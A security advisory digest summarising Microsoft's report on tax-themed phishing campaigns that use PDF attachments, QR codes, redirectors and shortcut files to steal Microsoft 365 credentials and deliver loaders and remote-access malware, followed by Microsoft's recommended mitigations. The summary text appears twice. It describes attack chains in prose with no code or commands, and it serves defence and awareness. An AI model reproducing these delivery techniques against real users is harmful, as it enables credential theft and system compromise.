Microsoft Warns of Tax-Themed Email Attacks Using PDFs and QR Codes to Deliver Malware
Summary:
As Tax Day in the U.S. approaches, Microsoft has observed a surge in phishing campaigns leveraging tax-related themes to steal credentials and deploy malware. These campaigns utilize various redirection techniques—such as URL shorteners, QR codes in attachments, and legitimate services like file-hosting platforms and business profile pages—to evade detection. Microsoft identified that many of these phishing operations lead to payloads delivered via the RaccoonO365 phishing-as-a-service platform, along with malware such as Remcos, Latrodectus, Brute Ratel C4, AHKBot, and GuLoader.
On February 6, 2025, a campaign attributed to Storm-0249 targeted U.S. users with tax-themed emails distributing BRc4 and Latrodectus. These emails used PDF attachments with embedded redirect links that eventually led to fake DocuSign pages. Depending on the system and IP filtering rules, users were either delivered malware-laced MSI installers or benign decoy PDFs. Latrodectus, a loader with anti-analysis features and dynamic C2 configurations, was delivered alongside BRc4, a red-teaming tool abused for post-exploitation.
From February 12 to 28, threat actors targeted over 2,300 organizations—mainly in engineering, IT, and consulting—with emails containing PDFs that displayed QR codes. These codes redirected to unique RaccoonO365 phishing links, designed to steal Microsoft 365 credentials.
On February 13, an IRS-themed phishing email led users to download a malicious Excel file via a Google Business page redirector. Once macros were enabled, the Excel file executed an MSI that launched AHKBot, which used AutoHotKey scripts to exfiltrate screenshots from compromised systems.
On March 3, a more targeted campaign impersonated potential tax clients to build trust with accountants and CPAs. Once rapport was established, follow-up emails included a PDF that linked to a Dropbox-hosted ZIP file containing malicious .lnk files. These files triggered PowerShell scripts to download GuLoader, which then installed Remcos.
Security Officer Comments:
These campaigns highlight the continued effectiveness of social engineering during seasonal events like tax season, especially when combined with malware delivery infrastructure and phishing-as-a-service platforms. Threat actors are increasingly using multilayered approaches—combining social trust-building, obfuscated file attachments, redirect chains, and abuse of legitimate platforms—to bypass detection and increase user interaction. Security teams should remain vigilant for indicators of compromise related to Latrodectus, BRc4, AHKBot, Remcos, and GuLoader, and implement layered defenses including email filtering, endpoint detection, threat hunting, and user education to reduce the risk of credential theft and system compromise.
Suggested Corrections:
Microsoft recommends the following mitigations to reduce the impact of this threat.
Link(s):
https://thehackernews.com/2025/04/microsoft-warns-of-tax-themed-email.html
As Tax Day in the U.S. approaches, Microsoft has observed a surge in phishing campaigns leveraging tax-related themes to steal credentials and deploy malware. These campaigns utilize various redirection techniques—such as URL shorteners, QR codes in attachments, and legitimate services like file-hosting platforms and business profile pages—to evade detection. Microsoft identified that many of these phishing operations lead to payloads delivered via the RaccoonO365 phishing-as-a-service platform, along with malware such as Remcos, Latrodectus, Brute Ratel C4, AHKBot, and GuLoader.
On February 6, 2025, a campaign attributed to Storm-0249 targeted U.S. users with tax-themed emails distributing BRc4 and Latrodectus. These emails used PDF attachments with embedded redirect links that eventually led to fake DocuSign pages. Depending on the system and IP filtering rules, users were either delivered malware-laced MSI installers or benign decoy PDFs. Latrodectus, a loader with anti-analysis features and dynamic C2 configurations, was delivered alongside BRc4, a red-teaming tool abused for post-exploitation.
From February 12 to 28, threat actors targeted over 2,300 organizations—mainly in engineering, IT, and consulting—with emails containing PDFs that displayed QR codes. These codes redirected to unique RaccoonO365 phishing links, designed to steal Microsoft 365 credentials.
On February 13, an IRS-themed phishing email led users to download a malicious Excel file via a Google Business page redirector. Once macros were enabled, the Excel file executed an MSI that launched AHKBot, which used AutoHotKey scripts to exfiltrate screenshots from compromised systems.
On March 3, a more targeted campaign impersonated potential tax clients to build trust with accountants and CPAs. Once rapport was established, follow-up emails included a PDF that linked to a Dropbox-hosted ZIP file containing malicious .lnk files. These files triggered PowerShell scripts to download GuLoader, which then installed Remcos.
Security Officer Comments:
These campaigns highlight the continued effectiveness of social engineering during seasonal events like tax season, especially when combined with malware delivery infrastructure and phishing-as-a-service platforms. Threat actors are increasingly using multilayered approaches—combining social trust-building, obfuscated file attachments, redirect chains, and abuse of legitimate platforms—to bypass detection and increase user interaction. Security teams should remain vigilant for indicators of compromise related to Latrodectus, BRc4, AHKBot, Remcos, and GuLoader, and implement layered defenses including email filtering, endpoint detection, threat hunting, and user education to reduce the risk of credential theft and system compromise.
Suggested Corrections:
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Educate users about protecting personal and business information in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity.
- Turn on Zero-hour auto purge (ZAP) in Defender for Office 365 to quarantine sent mail in response to newly-acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
- Pilot and deploy phishing-resistant authentication methods for users.
- Enforce multifactor authentication (MFA) on all accounts, remove users excluded from MFA, and strictly require MFA from all devices in all locations at all times.
- Implement Entra ID Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
- Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites including phishing sites, scam sites, and sites that contain exploits and host malware.
- Educate users about using the browser URL navigator to validate that upon clicking a link in search results they have arrived at an expected legitimate domain.
- Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
- Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow and time-of-click verification of URLs and links in email messages, other Microsoft Office applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links that are used in phishing and other attacks.
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
- Enable investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Run endpoint detection and response (EDR) in block mode, so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
Link(s):
https://thehackernews.com/2025/04/microsoft-warns-of-tax-themed-email.html